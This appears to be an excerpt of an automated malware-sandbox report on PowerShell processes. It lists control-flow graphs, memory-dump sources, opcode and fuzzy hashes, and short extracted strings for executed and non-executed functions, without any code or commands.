                                                                                control_flow_graph 84 7ffaac55993d-7ffaac559997 88 7ffaac55999d-7ffaac5599a7 84->88 89 7ffaac559c67-7ffaac559c9d 84->89 90 7ffaac5599a9-7ffaac5599c1 88->90 91 7ffaac5599c3-7ffaac5599d0 88->91 101 7ffaac559c9f-7ffaac559cc3 89->101 102 7ffaac559cc8-7ffaac559d08 89->102 90->91 97 7ffaac5599d6-7ffaac5599d9 91->97 98 7ffaac559c03-7ffaac559c0d 91->98 97->98 100 7ffaac5599df-7ffaac5599eb 97->100 103 7ffaac559c0f-7ffaac559c1b 98->103 104 7ffaac559c1c-7ffaac559c64 98->104 100->89 105 7ffaac5599f1-7ffaac5599fb 100->105 101->102 104->89 109 7ffaac5599fd-7ffaac559a0a 105->109 110 7ffaac559a14-7ffaac559a19 105->110 109->110 118 7ffaac559a0c-7ffaac559a12 109->118 110->98 113 7ffaac559a1f-7ffaac559a24 110->113 116 7ffaac559a3f 113->116 117 7ffaac559a26-7ffaac559a3d 113->117 121 7ffaac559a41-7ffaac559a43 116->121 117->121 118->110 121->98 123 7ffaac559a49-7ffaac559a4c 121->123 124 7ffaac559a4e-7ffaac559a71 123->124 125 7ffaac559a73 123->125 126 7ffaac559a75-7ffaac559a77 124->126 125->126 126->98 128 7ffaac559a7d-7ffaac559a98 126->128 132 7ffaac559a9a-7ffaac559ac2 128->132 132->98 136 7ffaac559ac8-7ffaac559ad8 132->136 137 7ffaac559ada-7ffaac559ae4 136->137 138 7ffaac559ae8 136->138 139 7ffaac559ae6 137->139 140 7ffaac559b04-7ffaac559b0f 137->140 142 7ffaac559aed-7ffaac559afa 138->142 139->142 140->132 143 7ffaac559b11-7ffaac559b22 140->143 142->140 146 7ffaac559afc-7ffaac559b02 142->146 143->138 145 7ffaac559b24-7ffaac559b2e 143->145 147 7ffaac559b30-7ffaac559b46 145->147 148 7ffaac559b47-7ffaac559bb5 145->148 146->140 147->148 157 7ffaac559bb7-7ffaac559bd3 148->157 158 7ffaac559bd5-7ffaac559bd6 148->158 157->158 160 7ffaac559bde-7ffaac559bea 158->160 162 7ffaac559bec-7ffaac559bf0 160->162 163 7ffaac559bf2-7ffaac559bf7 160->163 164 7ffaac559bf8-7ffaac559c02 162->164 163->164
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1785245696.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffaac550000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 6$6$r6$r6
                                                                                • API String ID: 0-3088321380
                                                                                • Opcode ID: d7c2e6d8ac7b4d844860b37cb6d80803275bcc6089730215855402b7b7508149
                                                                                • Instruction ID: c8b327405e2ba90a434cb88f36aa0f1c12ffc7fd758abcdc9fb1ec5cc0c199ad
                                                                                • Opcode Fuzzy Hash: d7c2e6d8ac7b4d844860b37cb6d80803275bcc6089730215855402b7b7508149
                                                                                • Instruction Fuzzy Hash: 29A1F171A1EA4F8FF794DB18C8556787BD5EF66310F5841BEE00DC3192DA2AEC0A8781
                                                                                Function 00007FFAAC498E54 Relevance: 1.6, APIs: 1, Instructions: 115libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 671 7ffaac498e54-7ffaac498e5b 672 7ffaac498e66-7ffaac498ecf 671->672 673 7ffaac498e5d-7ffaac498e65 671->673 676 7ffaac498ed9-7ffaac498f0b LoadLibraryExW 672->676 677 7ffaac498ed1-7ffaac498ed6 672->677 673->672 678 7ffaac498f13-7ffaac498f3a 676->678 679 7ffaac498f0d 676->679 677->676 679->678
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784749175.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffaac480000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: bd855a71d388d7bf151ea15902d3c4fe141c68bab9f0e6f9d600c67c03e0cb8d
                                                                                • Instruction ID: f0d4f47485d53063c10d6ed6a9b360a55a4d5b99e73e136f88294a39406521ca
                                                                                • Opcode Fuzzy Hash: bd855a71d388d7bf151ea15902d3c4fe141c68bab9f0e6f9d600c67c03e0cb8d
                                                                                • Instruction Fuzzy Hash: AE31C47190CA5C8FEB59DB6CC849AE9BBE1FF66320F04826BD009D3252DB75A405CB91
                                                                                Function 00007FFAAC552C95 Relevance: .4, Instructions: 438COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 738 7ffaac552c95-7ffaac552d24 742 7ffaac552d2a-7ffaac552d34 738->742 743 7ffaac552f8c-7ffaac55304b 738->743 744 7ffaac552d4d-7ffaac552d52 742->744 745 7ffaac552d36-7ffaac552d43 742->745 746 7ffaac552f30-7ffaac552f3a 744->746 747 7ffaac552d58-7ffaac552d5b 744->747 745->744 754 7ffaac552d45-7ffaac552d4b 745->754 750 7ffaac552f3c-7ffaac552f48 746->750 751 7ffaac552f49-7ffaac552f89 746->751 752 7ffaac552d5d-7ffaac552d70 747->752 753 7ffaac552d72 747->753 751->743 757 7ffaac552d74-7ffaac552d76 752->757 753->757 754->744 757->746 760 7ffaac552d7c-7ffaac552db0 757->760 774 7ffaac552dc7 760->774 775 7ffaac552db2-7ffaac552dc5 760->775 777 7ffaac552dc9-7ffaac552dcb 774->777 775->777 777->746 778 7ffaac552dd1-7ffaac552dd9 777->778 778->743 780 7ffaac552ddf-7ffaac552de9 778->780 781 7ffaac552deb-7ffaac552e03 780->781 782 7ffaac552e05-7ffaac552e15 780->782 781->782 782->746 786 7ffaac552e1b-7ffaac552e4c 782->786 786->746 792 7ffaac552e52-7ffaac552e7e 786->792 797 7ffaac552e80-7ffaac552ea7 792->797 798 7ffaac552ea9 792->798 799 7ffaac552eab-7ffaac552ead 797->799 798->799 799->746 800 7ffaac552eb3-7ffaac552ebb 799->800 802 7ffaac552ecb 800->802 803 7ffaac552ebd-7ffaac552ec7 800->803 807 7ffaac552ed0-7ffaac552ee5 802->807 804 7ffaac552ee7-7ffaac552f16 803->804 805 7ffaac552ec9 803->805 812 7ffaac552f1d-7ffaac552f2f 804->812 805->807 807->804
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1785245696.00007FFAAC550000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC550000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffaac550000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 56e290220b6c0981cf08991fe80d1077ff3b4e74242b291298b50e5286c55cb7
                                                                                • Instruction ID: 0cb96770473c32f2900dbe87703774a319d3ec9f5d726b50e5e4ac2f1ff180ea
                                                                                • Opcode Fuzzy Hash: 56e290220b6c0981cf08991fe80d1077ff3b4e74242b291298b50e5286c55cb7
                                                                                • Instruction Fuzzy Hash: A0D16572A5EA8F8FF755AB288C155B97BE4EF56310B0840BEE04DC70D3DA1AD8098391

                                                                                Non-executed Functions

                                                                                Function 00007FFAAC49B86C Relevance: 5.8, Strings: 4, Instructions: 793COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784749175.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffaac480000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: L$nM_H$peA~$peA~
                                                                                • API String ID: 0-1244331265
                                                                                • Opcode ID: 63b86d32c559bf650e3af10a8a4281e8e25339bb931092e7c7f773205b3a54d3
                                                                                • Instruction ID: 1147745a7d4eadf5f1e2d73ba1ec125089c289c80507dd8b37ca783485c34d41
                                                                                • Opcode Fuzzy Hash: 63b86d32c559bf650e3af10a8a4281e8e25339bb931092e7c7f773205b3a54d3
                                                                                • Instruction Fuzzy Hash: 6B42F43091DA998FEB78DB288809BA877D0FF46304F04C5BDD84DC7292DA39E90987C5
                                                                                Function 00007FFAAC49B8F5 Relevance: 4.3, Strings: 3, Instructions: 597COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784749175.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffaac480000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: L$peA~$peA~
                                                                                • API String ID: 0-86172916
                                                                                • Opcode ID: 5f9835bd8595c941938af8ecb226a6c26a1e382ec2603a891c0c8cd611a9659e
                                                                                • Instruction ID: 8202b6967a6f4dacfc00685c7698a5849add5461b8a2dfe247ae1e003c38a706
                                                                                • Opcode Fuzzy Hash: 5f9835bd8595c941938af8ecb226a6c26a1e382ec2603a891c0c8cd611a9659e
                                                                                • Instruction Fuzzy Hash: 7212BF70919A598FEBB8DF18C849BA977D0FF5A304F00C579D80EC7292DA39E90987C5
                                                                                Function 00007FFAAC49436C Relevance: .9, Instructions: 873COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1784749175.00007FFAAC480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC480000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ffaac480000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 650acb1f8f97f75227c548e6e7f8b462a3f9ddc6cdfaa3d042402357c22c3876
                                                                                • Instruction ID: eeac984831c81dcc9695723412ce647ab7486e430096034d249bad40a6ff686c
                                                                                • Opcode Fuzzy Hash: 650acb1f8f97f75227c548e6e7f8b462a3f9ddc6cdfaa3d042402357c22c3876
                                                                                • Instruction Fuzzy Hash: D4626371D189598FFB94EB18C889BA9B7E1FFA9304F5081F9D04DD3252DE35AD818B80

                                                                                Executed Functions

                                                                                Function 00007FFAAC4BB966 Relevance: .5, Instructions: 477COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1924796291.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_7ffaac4b0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a50a0c06addb7b2fb02ab97b804fd74e502660e9f4f18361472c85e9fc14aa71
                                                                                • Instruction ID: 9847c1388bc1a64d343f02ec5ff982514d1e3fce0e9f67bc207de06a15e657e0
                                                                                • Opcode Fuzzy Hash: a50a0c06addb7b2fb02ab97b804fd74e502660e9f4f18361472c85e9fc14aa71
                                                                                • Instruction Fuzzy Hash: D3F19530908A4D8FEBA8DF28C8557E977E1FF55310F04826ED84DC7692DF34A9458B81
                                                                                Function 00007FFAAC4BC712 Relevance: .5, Instructions: 463COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1924796291.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_7ffaac4b0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5e0253b0fcd1ebb3ceec5798e39a0c84749fbcfb0b9893198fdb63a2b6cb058d
                                                                                • Instruction ID: 006f4b7440665107305126175cccc01e38be9f7c5a18690895e961ca1494acff
                                                                                • Opcode Fuzzy Hash: 5e0253b0fcd1ebb3ceec5798e39a0c84749fbcfb0b9893198fdb63a2b6cb058d
                                                                                • Instruction Fuzzy Hash: 11E1B37090DA4E8FEBA8DF28C8597E97BD1FB55310F04826ED84DC7292CA74A8458BC1
                                                                                Function 00007FFAAC5809F2 Relevance: 1.7, Strings: 1, Instructions: 411COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1925584758.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_7ffaac580000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 1?_L
                                                                                • API String ID: 0-78491221
                                                                                • Opcode ID: 000fb51c26bb6c36533e40d748fe7ecb2c32ce64822eba4a5315c35154a2aa23
                                                                                • Instruction ID: e829774a96eea78b5904217f8d7fc2eb8fbd623105a3af13b69870ebe055364c
                                                                                • Opcode Fuzzy Hash: 000fb51c26bb6c36533e40d748fe7ecb2c32ce64822eba4a5315c35154a2aa23
                                                                                • Instruction Fuzzy Hash: A7C14921A0EBC64FE79A9B2888559757FE1DF97210B0841FFD08DCB1A3D919E90AC3C1
                                                                                Function 00007FFAAC4BF16A Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1924796291.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_7ffaac4b0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 6
                                                                                • API String ID: 0-1452363761
                                                                                • Opcode ID: 10daa19c8964b991271e1fd1cba04d4111a2d550bc5c0105241e90280bb23582
                                                                                • Instruction ID: d4848d8d0ba3673782fe0fb31eee7785c937a0e23d7d9c491808d9356b44be85
                                                                                • Opcode Fuzzy Hash: 10daa19c8964b991271e1fd1cba04d4111a2d550bc5c0105241e90280bb23582
                                                                                • Instruction Fuzzy Hash: 98712675A1CE498FFB58DB68885A6B877D2EF49304F1440B9D44EC3693CD29EC028785
                                                                                Function 00007FFAAC580A2B Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1925584758.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_7ffaac580000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 1?_L
                                                                                • API String ID: 0-78491221
                                                                                • Opcode ID: 01a1833d1760951777b2e32b4e4a2dbc40c9b1c4590e1833a8210119514328a2
                                                                                • Instruction ID: 7825f9a83d4eba749fd40131aa74ff670f3ac384d080be11db6b696c8625e341
                                                                                • Opcode Fuzzy Hash: 01a1833d1760951777b2e32b4e4a2dbc40c9b1c4590e1833a8210119514328a2
                                                                                • Instruction Fuzzy Hash: F3717E30A0EB8A4FEB99DB2C88558757FE1EF96300B0445EED04EC71A2D915F90AC7C1
                                                                                Function 00007FFAAC5833D5 Relevance: .4, Instructions: 448COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1925584758.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_7ffaac580000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c5d021717f3390f0db3809a9c4fb070b3deb221290f4d630267827cfb63f88d8
                                                                                • Instruction ID: e8d2412e82118960c1152d78895ee6163e76a9324a3085b03267b9e4d708e969
                                                                                • Opcode Fuzzy Hash: c5d021717f3390f0db3809a9c4fb070b3deb221290f4d630267827cfb63f88d8
                                                                                • Instruction Fuzzy Hash: 0DD14471A4EA8A8FF796AB6CC8195B57FD4EF46220F0841FEE04DC71E3D918D9098391
                                                                                Function 00007FFAAC4BC326 Relevance: .3, Instructions: 336COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1924796291.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_7ffaac4b0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d4c6c2c325090d1939fb5a331ce56de39ac1387cc3500c6f1481e41dc5e69b23
                                                                                • Instruction ID: 9b77240cbeaf32a4dfe3a1bf5434c202c93024f3a88bc8c1d57398b6e5704d15
                                                                                • Opcode Fuzzy Hash: d4c6c2c325090d1939fb5a331ce56de39ac1387cc3500c6f1481e41dc5e69b23
                                                                                • Instruction Fuzzy Hash: C3B1A47050DA8D8FEB68DF28C8557E93BE1FF55310F04826EE84DC7292CA34A9458BC6
                                                                                Function 00007FFAAC4C1715 Relevance: .1, Instructions: 104COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1924796291.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_7ffaac4b0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 83c0d986edee96a20470cba00e55d342ccb202241b71a37f00cc2fbda0653413
                                                                                • Instruction ID: 47d9a00b8e85f865d7a0db074bb1453472ca62a6c7de432dafafe9220115a375
                                                                                • Opcode Fuzzy Hash: 83c0d986edee96a20470cba00e55d342ccb202241b71a37f00cc2fbda0653413
                                                                                • Instruction Fuzzy Hash: 5B313671D1DA498FF755E728C4596F477E2EF95304F0485FAC00DC71A2DE249D894784
                                                                                Function 00007FFAAC4BBE24 Relevance: .1, Instructions: 92COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1924796291.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_7ffaac4b0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 420004c0804f551b0feda52a047c04a944db723e61cfb230a033e64f65ea92ca
                                                                                • Instruction ID: 581a7485836047f1d7bd0d87199214cb34df90f991ba2b5744a2e51946407b5e
                                                                                • Opcode Fuzzy Hash: 420004c0804f551b0feda52a047c04a944db723e61cfb230a033e64f65ea92ca
                                                                                • Instruction Fuzzy Hash: AF31417081964DCFFBB49F14CC8ABF83290FF42319F408539E54D86193CA38A949CB55
                                                                                Function 00007FFAAC4C634A Relevance: .1, Instructions: 86COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1924796291.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_7ffaac4b0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b8f0a6db4090d84cb525f420a86a0d7257905f65f8185a5ec86e5a9a39417a2d
                                                                                • Instruction ID: 07b97aaf3dcb4c165d4b60bf7d39eda926d2817c2a1e873a27d99ac07a8dcc42
                                                                                • Opcode Fuzzy Hash: b8f0a6db4090d84cb525f420a86a0d7257905f65f8185a5ec86e5a9a39417a2d
                                                                                • Instruction Fuzzy Hash: 3921A47190CA0C9FEB18DF59D44ABF9BBE0FB5A321F00422ED04AD3651DB70A455CB91
                                                                                Function 00007FFAAC4C169D Relevance: .1, Instructions: 71COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1924796291.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_7ffaac4b0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 08b733d2902ea1ce9a2c93267cb615835a49faea382cb9c0b452b065e9e51952
                                                                                • Instruction ID: c6248f04e1bd4c8a6f61aef1e070878639c61e0c615ec6d2f37a0ca356a7b58f
                                                                                • Opcode Fuzzy Hash: 08b733d2902ea1ce9a2c93267cb615835a49faea382cb9c0b452b065e9e51952
                                                                                • Instruction Fuzzy Hash: 5A11579954F2C58FF343636858284B27FE8CE83238B0C46EBD0DCC60A3D408485AC386
                                                                                Function 00007FFAAC4C4201 Relevance: .1, Instructions: 69COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1924796291.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_7ffaac4b0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 357fe3ccba5b18dba9d984332cac68ab28d54c8c41baa69125e783f962d4d04b
                                                                                • Instruction ID: 845725e53da00e0a9486d7f6af6f9ebc2df9624b15b5e15a2630f7e7a833b41a
                                                                                • Opcode Fuzzy Hash: 357fe3ccba5b18dba9d984332cac68ab28d54c8c41baa69125e783f962d4d04b
                                                                                • Instruction Fuzzy Hash: 6911C65191E6C68FF342936C841D6A43FD1EF96254F4980FAC08CCB1D3CD1C98098396
                                                                                Function 00007FFAAC4B33B5 Relevance: .0, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1924796291.00007FFAAC4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_7ffaac4b0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                • Instruction ID: 231654166290f5aadbc79f4ed625963942538d9f7cba3e32cf140116f3ff2d59
                                                                                • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                • Instruction Fuzzy Hash: 2201677111CB0C8FD744EF0CE451AA6B7E0FB99364F50056EE58AC3661DA36E892CB45